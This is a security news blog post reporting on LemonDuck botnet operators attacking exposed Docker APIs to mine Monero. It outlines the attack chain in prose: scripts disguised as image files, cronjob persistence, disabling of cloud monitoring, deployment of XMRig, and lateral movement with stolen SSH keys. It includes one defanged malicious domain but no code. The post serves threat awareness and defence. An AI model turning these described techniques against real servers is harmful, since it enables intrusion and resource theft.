Search This Blog

Powered by Blogger.

Blog Archive

Labels

Docker Servers Targeted by LemonDuck Cryptomining Campaign

The authors of the botnet are attacking Linux servers for mining Monero cryptocurrency.

 

LemonDuck botnet operators have launched a large-scale Monero cryptomining campaign targeting Docker APIs on Linux servers. Cryptomining hackers are a persistent danger to Docker systems that aren’t properly shielded or configured, with multiple mass-exploitation efforts recorded in recent years.

The cryptomining malware was first identified in 2019 by researchers from Trend Micro while targeting enterprise networks. Previously, the botnet has targeted Microsoft Exchange servers, Linux machines via SSH brute force attacks, Windows systems susceptible to SMBGhost, and servers running Redis and Hadoop instances. 

Methodology Employed 

The LemonDuck botnet secures access to the exposed Docker APIs and runs a malicious container to fetch a Bash script disguised as a PNG image. 

The script is downloaded from the domain t.m7n0y[.]com, which was observed in other LemonDuck attacks. 

“The “core.png” file acts as a pivot by setting a Linux cronjob inside the container. Next, this cronjob downloads another disguised file “a.asp,” which is actually a Bash file,” Crowdstrikes researchers explained. “The “a.asp” file is the actual payload in this attack. It takes several steps before downloading and starting a mining operation once it is triggered by a cronjob, as follows.” 

The Bash file (a.asp) performs the following actions: 

• Kill processes based on names of known mining pools, competing cryptomining groups, etc. 
• Kill daemons like crond, sshd and syslog. 
• Delete known indicator of compromise (IOC) file paths. 
• Kill network connections to C2s known to belong to competing cryptomining groups. 
• Disable Alibaba Cloud’s monitoring service that protects instances from risky activities. 

Last year in November, cryptomining malware used by unknown attackers was found to disable protective mechanisms in Alibaba Cloud services. After doing the above tasks, the Bash script then downloads and executes the cryptomining program XMRig and a configuration file that hides the actor’s wallets behind proxy pools. 

After the initially infected machine has been set up to mine, Lemon_Duck attempts lateral movement by leveraging SSH keys found on the filesystem. If those are available, the attacker will employ them to carry out a second infection. Hiding the Docker APIs properly on cloud instances is currently the only solution for avoiding LemonDuck crypto-mining attacks.
Share it:

Botnet

cryptocurrency

Crytomining

Technology